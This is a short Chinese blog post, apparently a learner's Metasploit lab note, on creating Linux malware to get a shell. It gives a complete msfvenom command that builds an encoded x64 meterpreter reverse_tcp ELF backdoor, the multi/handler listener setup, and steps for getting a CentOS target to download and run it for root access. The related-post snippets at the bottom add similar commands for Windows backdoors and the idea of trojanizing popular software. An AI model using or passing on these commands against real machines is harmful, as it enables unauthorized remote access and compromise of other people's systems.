制作Linux恶意软件获取shell

于 2024-07-23 17:05:07 发布
阅读量195 收藏 4
点赞数 2
文章标签: linux 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Time_worm/article/details/140640127
版权

继续学习metasploit的实战应用,这次针对Linux系统实施渗透

1、使用mfsvenom生成Linux可执行文件

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.47.165 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/lzb

-f 指定 elf 即 linux 操作系统的可执行文件类型

2、打开MSF配置监听

还是使用exploit/multi/handler模块进行监听,但和之前不同的是,本次针对的是Linux的操作系统,所以要将payload更改为和上面生成对应的payload

set payload linux/x64/meterpreter/reverse_tcp

最终的配置如下

运行开始监听

3、目标机运行恶意程序

这里使用CentOS7作为目标机,kali攻击机先打开apache服务器,然后目标机通过服务器下载恶意软件

给予执行权限并运行

立刻获得root权限

当我们更换lzb用户去运行文件时,攻击机获得的权限就是lzb的权限

Time_worm
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
制作linux恶意软件获取shell
赴前尘
06-27 167
制作linux恶意软件获取shell
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1138
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
制作linux恶意软件获取shell加实战
xiao_he0123的博客
02-25 1212
一.使用msf制作linux后门 二. 实战,给软件加后门 制作linux后门 1.使用msfvenom生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo -a x64 ...
msf制作Linux恶意软件获取shell
Deeeelete的博客
02-26 732
1.生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.132.144 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/clownclown 2.配置监听 3.拖进系统 4.赋予权限 5.运行 ...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1086
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
制作Windows恶意软件获取shell
2301_77927094的博客
09-10 114
shell 本身并不是内核的一部分,它只是站在内核的基础上编写的一个应用程序。后门病毒是一种计算机恶意程序,利用安全漏洞为攻击者提供对受感染电脑的未经授权的远程访问,后门病毒在后台运行,对用户隐藏,后门被认为是最危险的寄生虫类型病毒之一,因为它允许恶意软件在受感染的计算机上执行任何可能的操作。windows/meterpreter/reverse_tcp:目标系统/攻击架构/攻击方式(这里是对windows系统进行攻击使用的后渗透架构为meterpreter用反向链接的方式。是用来生成后门的软件
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3496
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5373
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 1007
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
LinuxShell脚本编程实例
09-09
Linux Shell脚本编程实例 Linux Shell脚本编程实例是指使用Linux Shell编程语言编写的脚本程序,用于自动化系统管理、数据处理、网络管理等任务。Shell脚本语言是Linux操作系统的命令解释器,它可以读取用户的命令...
linux shell 脚本示例 升级用
最新发布
06-18
Linux环境 shell脚本编写用例 关于如何更新软件包;希望对你有启发
Linux-shell获取天气
01-09
Linux中的shell获取天气,本来觉的比较难,原来,真简单,个位数的代码搞定。  1获取对应城市天气  所有天气信息都从中国天气网获取。每一个城市多会对应一个id(比如,北京为101010100,因为本人在银川,所以...
详细介绍Linux shell脚本基础学习
09-09
Linux Shell脚本基础学习是掌握Linux系统管理与自动化任务的关键技能之一。在这篇文章中,我们将逐步探讨Shell脚本的基础知识,帮助初学者建立坚实的编程基础。 首先,让我们从Shell脚本的开头开始。每个Shell脚本...
Linux Shell获取文件夹下的文件名方法
09-15
本文将详细解释如何使用Linux Shell获取文件夹下的文件名,并给出具体的示例脚本。 首先,我们需要理解基本的Shell命令。`ls` 是一个常用的命令,用于列出目录中的文件和子目录。例如,如果我们想查看当前目录下...
Linux操作系统Shell脚本.zip
03-05
Linux操作系统Shell脚本.zipLinux操作系统Shell脚本.zipLinux操作系统Shell脚本.zip Linux操作系统Shell脚本.zipLinux操作系统Shell脚本.zipLinux操作系统Shell脚本.zip Linux操作系统Shell脚本.zipLinux操作系统...
Linux Shell制作录制回放功能脚本
09-15
主要为大家详细介绍了Linux Shell制作录制回放功能脚本,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
linuxshell的工作原理
08-30
"linuxshell的工作原理" Linux操作系统中的shell是用户和系统之间的接口,提供了命令语言、命令解释程序及程序设计语言的统称。shell是一个命令语言解释器,拥有自己内建的shell命令集,shell也能被系统中其他...
linux Shell获取某目录下所有文件夹的名称
01-20
查看目录下面的所有文件: #!/bin/bash cd /目标目录 for file in $(ls *) do echo $file done 延伸的方法,查看目录下面的所有目录 ...cd /export/bak/original_document ... [ -d $dir ] && echo $dir #先判断是否是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值